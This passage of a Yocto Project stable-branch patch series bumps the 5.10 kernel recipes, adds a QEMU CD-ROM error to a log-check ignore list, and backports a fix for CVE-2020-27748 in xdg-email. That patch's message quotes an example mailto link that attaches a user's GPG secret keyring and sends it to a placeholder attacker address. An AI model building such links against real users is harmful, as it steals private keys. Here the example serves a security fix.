    015e2c900b5d efi/libstub: arm64: Relax 2M alignment again for relocatable kernels
    feb4a01d3ece efi/libstub: arm64: Force Image reallocation if BSS was not reserved
    afcb84e6cf8c arm64: efi: kaslr: Fix occasional random alloc (and boot) failure
    e0ee8d9c31b5 nbd: Aovid double completion of a request
    f5cefe9a52a6 vsock/virtio: avoid potential deadlock when vsock device remove
    dff830e5e723 xen/events: Fix race in set_evtchn_to_irq
    65395b053d03 drm/i915: Only access SFC_DONE when media domain is not fused off
    4344440d91b3 net: igmp: increase size of mr_ifc_count
    696afe28dc51 tcp_bbr: fix u32 wrap bug in round logic if bbr_init() called after 2B packets
    8976606ca347 net: linkwatch: fix failure to restore device state across suspend/resume
    4c2af90119ea net: bridge: fix memleak in br_add_if()
    f333a5ca71c3 net: bridge: fix flags interpretation for extern learn fdb entries
    e3b949b86d09 net: bridge: validate the NUD_PERMANENT bit when adding an extern_learn FDB entry
    1cad01aca1fa net: dsa: sja1105: fix broken backpressure in .port_fdb_dump
    56cc3408ff2a net: dsa: lantiq: fix broken backpressure in .port_fdb_dump
    f7720b35cd32 net: dsa: lan9303: fix broken backpressure in .port_fdb_dump
    24e1b7dbb174 net: igmp: fix data-race in igmp_ifc_timer_expire()
    69b13167a636 net: Fix memory leak in ieee802154_raw_deliver
    dbfaf7a6a23a net: dsa: microchip: ksz8795: Fix VLAN filtering
    ccc1fe82c878 net: dsa: microchip: Fix ksz_read64()
    558092b8ed31 drm/meson: fix colour distortion from HDR set during vendor u-boot
    6e1886465dea net/mlx5: Fix return value from tracer initialization
    303ba011f5e1 net/mlx5: Synchronize correct IRQ when destroying CQ
    00a0c11ddd72 bareudp: Fix invalid read beyond skb's linear data
    30b1fc47f765 psample: Add a fwd declaration for skbuff
    b3f0b170842c iavf: Set RSS LUT and key in reset handle path
    a6192bae12e4 ice: don't remove netdev->dev_addr from uc sync list
    bae5b521feaa ice: Prevent probing virtual functions
    059238c52c61 net: sched: act_mirred: Reset ct info when mirror/redirect skb
    f15f7716b047 net/smc: fix wait on already cleared link
    51f4965d775e ppp: Fix generating ifname when empty IFLA_IFNAME is specified
    046579c9fc28 net: phy: micrel: Fix link detection on ksz87xx switch"
    e95620c3bdff bpf: Fix integer overflow involving bucket_size
    1960c3ac5268 libbpf: Fix probe for BPF_PROG_TYPE_CGROUP_SOCKOPT
    a3e9a3e22844 platform/x86: pcengines-apuv2: Add missing terminating entries to gpio-lookup tables
    53ebbfdd0e37 net: mvvp2: fix short frame size on s390
    784320edb6c5 net: dsa: mt7530: add the missing RxUnicast MIB counter
    20a80319028c ASoC: cs42l42: Fix LRCLK frame start edge
    750503aecf4e pinctrl: tigerlake: Fix GPIO mapping for newer version of software
    be49d5437d1a netfilter: nf_conntrack_bridge: Fix memory leak when error
    aa6b17bfefbc ASoC: cs42l42: Remove duplicate control for WNF filter frequency
    b268f9f6b73f ASoC: cs42l42: Fix inversion of ADC Notch Switch control
    2386a8cde18e ASoC: SOF: Intel: hda-ipc: fix reply size checking
    0e47f99e8680 ASoC: cs42l42: Don't allow SND_SOC_DAIFMT_LEFT_J
    576939671f74 ASoC: cs42l42: Correct definition of ADC Volume control
    a21963c35f16 pinctrl: mediatek: Fix fallback behavior for bias_set_combo
    27188a938291 ieee802154: hwsim: fix GPF in hwsim_new_edge_nl
    528f17c02db9 ieee802154: hwsim: fix GPF in hwsim_set_edge_lqi
    95de3592f87e drm/amdgpu: don't enable baco on boco platforms in runpm
    bd80d11a516c drm/amd/display: use GFP_ATOMIC in amdgpu_dm_irq_schedule_work
    ae311a7418f1 drm/amd/display: Remove invalid assert for ODM + MPC case
    c2351e5faa3e libnvdimm/region: Fix label activation vs errors
    366de90ccfa2 ACPI: NFIT: Fix support for virtual SPA ranges
    f3fcf9d1b759 ceph: reduce contention in ceph_check_delayed_caps()
    ca6dea44bd8c ARC: fp: set FPU_STATUS.FWE to enable FPU_STATUS update on context switch
    4716a2145bbf net: ethernet: ti: cpsw: fix min eth packet size for non-switch use-cases
    561d13128bb8 seccomp: Fix setting loaded filter count during TSYNC
    54916988a0fb scsi: lpfc: Move initialization of phba->poll_list earlier to avoid crash
    3db5cb922800 cifs: create sd context must be a multiple of 8
    d1398e3715b1 i2c: dev: zero out array used for i2c reads from userspace
    b8bceace43dd ASoC: intel: atom: Fix reference to PCM buffer address
    261613ef340b ASoC: tlv320aic31xx: Fix jack detection after suspend
    7e5a7fa68b27 ASoC: uniphier: Fix reference to PCM buffer address
    209eb62b45fe ASoC: xilinx: Fix reference to PCM buffer address
    c419c4c91b30 ASoC: amd: Fix reference to PCM buffer address
    0c9adae11701 iio: adc: Fix incorrect exit of for-loop
    632279e5057c iio: humidity: hdc100x: Add margin to the conversion time
    45de224b1332 iio: adis: set GPIO reset pin direction
    d0532ed064d1 iio: adc: ti-ads7950: Ensure CS is deasserted after reading channels

Signed-off-by: Bruce Ashfield <bruce.ashfield@gmail.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 94fef82258d02285009d08b7a1791de124ff8f45)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 .../linux/linux-yocto-rt_5.10.bb              |  6 ++---
 .../linux/linux-yocto-tiny_5.10.bb            |  8 +++----
 meta/recipes-kernel/linux/linux-yocto_5.10.bb | 24 +++++++++----------
 3 files changed, 19 insertions(+), 19 deletions(-)

diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb
index 44f570b6a9..57fe10ea2d 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.10.bb
@@ -11,13 +11,13 @@ python () {
         raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
 }
 
-SRCREV_machine ?= "459fd323295a5bb19d8ccec0e29dd9d2ba367d81"
-SRCREV_meta ?= "8b02c1cd3424cee6f8d251be8fce9999e59fcf4e"
+SRCREV_machine ?= "c8efa3efd890f35f8037a8c3533ba52e6de83fdf"
+SRCREV_meta ?= "bce2813b162bb472c137fb503951295a931c25b6"
 
 SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
            git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.10;destsuffix=${KMETA}"
 
-LINUX_VERSION ?= "5.10.59"
+LINUX_VERSION ?= "5.10.60"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb
index 1f1365be4d..40f4533bde 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.10.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
 
 require recipes-kernel/linux/linux-yocto.inc
 
-LINUX_VERSION ?= "5.10.59"
+LINUX_VERSION ?= "5.10.60"
 LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
 KMETA = "kernel-meta"
 KCONF_BSP_AUDIT_LEVEL = "2"
 
-SRCREV_machine_qemuarm ?= "124fe0804bda0a51267a847c8e9578630fdbbc99"
-SRCREV_machine ?= "d2ff9c7472c1c748425c04d01e4a682501a0945c"
-SRCREV_meta ?= "8b02c1cd3424cee6f8d251be8fce9999e59fcf4e"
+SRCREV_machine_qemuarm ?= "ffaf70463da1502399f192470dae2d2fbdc7cfbc"
+SRCREV_machine ?= "f92b026dba8bd4e55a5cc88b6231f9118a6ac26b"
+SRCREV_meta ?= "bce2813b162bb472c137fb503951295a931c25b6"
 
 PV = "${LINUX_VERSION}+git${SRCPV}"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.10.bb b/meta/recipes-kernel/linux/linux-yocto_5.10.bb
index 254a0a42ad..d308938f7e 100644
--- a/meta/recipes-kernel/linux/linux-yocto_5.10.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.10.bb
@@ -13,17 +13,17 @@ KBRANCH_qemux86  ?= "v5.10/standard/base"
 KBRANCH_qemux86-64 ?= "v5.10/standard/base"
 KBRANCH_qemumips64 ?= "v5.10/standard/mti-malta64"
 
-SRCREV_machine_qemuarm ?= "0978a83dfdb5b685cb0bf102c806a768afb87ae9"
-SRCREV_machine_qemuarm64 ?= "4419f5b76905d079459659e22e68206295461cc4"
-SRCREV_machine_qemumips ?= "258e3d3c45063749d28d8c5f0be7f7de7a7a9a07"
-SRCREV_machine_qemuppc ?= "9b76cd9298382a9d1f49297a094def200504da38"
-SRCREV_machine_qemuriscv64 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
-SRCREV_machine_qemuriscv32 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
-SRCREV_machine_qemux86 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
-SRCREV_machine_qemux86-64 ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
-SRCREV_machine_qemumips64 ?= "35aae8ce2453e7c72c933ec7b61df88b2dc49d55"
-SRCREV_machine ?= "0e615f60692e56f2f0c68c1560c95804b8d9b6cf"
-SRCREV_meta ?= "8b02c1cd3424cee6f8d251be8fce9999e59fcf4e"
+SRCREV_machine_qemuarm ?= "1d02041bcc6eb8969d832e89b5c893d717b7ed04"
+SRCREV_machine_qemuarm64 ?= "2675ef4d9aefc588d16d085718866a33c62c10e6"
+SRCREV_machine_qemumips ?= "b503b2da9b2487453a9d9b0fa99654f00e1ad311"
+SRCREV_machine_qemuppc ?= "4ef9462af524cbbfcb719304a923e51f88cc3e68"
+SRCREV_machine_qemuriscv64 ?= "65ba2a0d8428c23b7b4375994d417157a35a251b"
+SRCREV_machine_qemuriscv32 ?= "65ba2a0d8428c23b7b4375994d417157a35a251b"
+SRCREV_machine_qemux86 ?= "65ba2a0d8428c23b7b4375994d417157a35a251b"
+SRCREV_machine_qemux86-64 ?= "65ba2a0d8428c23b7b4375994d417157a35a251b"
+SRCREV_machine_qemumips64 ?= "2d0707a62d33b1626329fde6ed9e906f5aba3022"
+SRCREV_machine ?= "65ba2a0d8428c23b7b4375994d417157a35a251b"
+SRCREV_meta ?= "bce2813b162bb472c137fb503951295a931c25b6"
 
 # remap qemuarm to qemuarma15 for the 5.8 kernel
 # KMACHINE_qemuarm ?= "qemuarma15"
@@ -32,7 +32,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
            git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.10;destsuffix=${KMETA}"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
-LINUX_VERSION ?= "5.10.59"
+LINUX_VERSION ?= "5.10.60"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
 DEPENDS += "openssl-native util-linux-native"
-- 
2.31.1

[hardknott][PATCH 09/11] parselogs.py: ignore intermittent CD/DVDROM identification failure

[Anuj Mittal]

From: Bruce Ashfield <bruce.ashfield@gmail.com>

We don't use the CD/DVD ROM drive in any of our tests, but it
periodically fails discovery and that leads to a QA error:

    [    6.403477] ata3.00: failed to IDENTIFY (I/O error, err_mask=0x4)

The only way to disable the optical ROM drive in qemu is to use
the '-nodefaults' option, which disables the CDROM (among other things).
We can't be sure that none of our tests, or extended users are relying
on default devices, so using that option is more of a risk than adding
the message to our ignore list.

To date, no one has sent a patch to just disable the optical drive
(either in qemu or the BIOS), but that is something we could consider
in the future.

[YOCTO #14528]

Signed-off-by: Bruce Ashfield <bruce.ashfield@gmail.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 143fc5504539c69752ca87717507c197a8920ce5)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 meta/lib/oeqa/runtime/cases/parselogs.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index e06f92727e..7f085565e2 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -97,6 +97,7 @@ ignore_errors = {
     'qemux86' : [
         'Failed to access perfctr msr (MSR',
         'pci 0000:00:00.0: [Firmware Bug]: reg 0x..: invalid BAR (can\'t size)',
+        'failed to IDENTIFY (I/O error, err_mask=0x4)',
         ] + qemux86_common,
     'qemux86-64' : qemux86_common,
     'qemumips' : [
-- 
2.31.1

[hardknott][PATCH 10/11] oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86 machines

[Anuj Mittal]

From: Richard Purdie <richard.purdie@linuxfoundation.org>

This log checking fix is needed for both qemux86 and qemux86-64 so move
to the common section.

[YOCTO #14528]

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 2475ce68f0bc1f342c75364dfcfaf7f30499badf)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 meta/lib/oeqa/runtime/cases/parselogs.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index 7f085565e2..01b633d89e 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -90,6 +90,7 @@ qemux86_common = [
     "glamor initialization failed",
     "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
     "floppy: error",
+    'failed to IDENTIFY (I/O error, err_mask=0x4)',
 ] + common_errors
 
 ignore_errors = {
@@ -97,7 +98,6 @@ ignore_errors = {
     'qemux86' : [
         'Failed to access perfctr msr (MSR',
         'pci 0000:00:00.0: [Firmware Bug]: reg 0x..: invalid BAR (can\'t size)',
-        'failed to IDENTIFY (I/O error, err_mask=0x4)',
         ] + qemux86_common,
     'qemux86-64' : qemux86_common,
     'qemumips' : [
-- 
2.31.1

[hardknott][PATCH 11/11] xdg-utils: Add fix for CVE-2020-27748

[Anuj Mittal]

From: Richard Purdie <richard.purdie@linuxfoundation.org>

Backport an upstream patch for the CVE.

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 87191ed0303f6552865ad1edcacd674c57f2010c)
Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
---
 ...9813e0eb0246f63b54e9e154970e609575af.patch | 58 +++++++++++++++++++
 .../xdg-utils/xdg-utils_1.1.3.bb              |  1 +
 2 files changed, 59 insertions(+)
 create mode 100644 meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch

diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+ 
+ run_thunderbird()
+ {
+-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+     THUNDERBIRD="$1"
+     MAILTO=$(echo "$2" | sed 's/^mailto://')
+     echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+     BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+     SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+     BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-    ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+ 
+     if [ -z "$TO" ] ; then
+         NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+         NEWMAILTO="${NEWMAILTO},$BODY"
+     fi
+ 
+-    if [ -n "$ATTACH" ] ; then
+-        NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+-    fi
+-
+     NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+     DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+     "$THUNDERBIRD" -compose "$NEWMAILTO"
+-- 
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..41b74b8598 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
 SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
            file://0001-Reinstate-xdg-terminal.patch \
            file://0001-Don-t-build-the-in-script-manual.patch \
+           file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
           "
 
 SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
-- 
2.31.1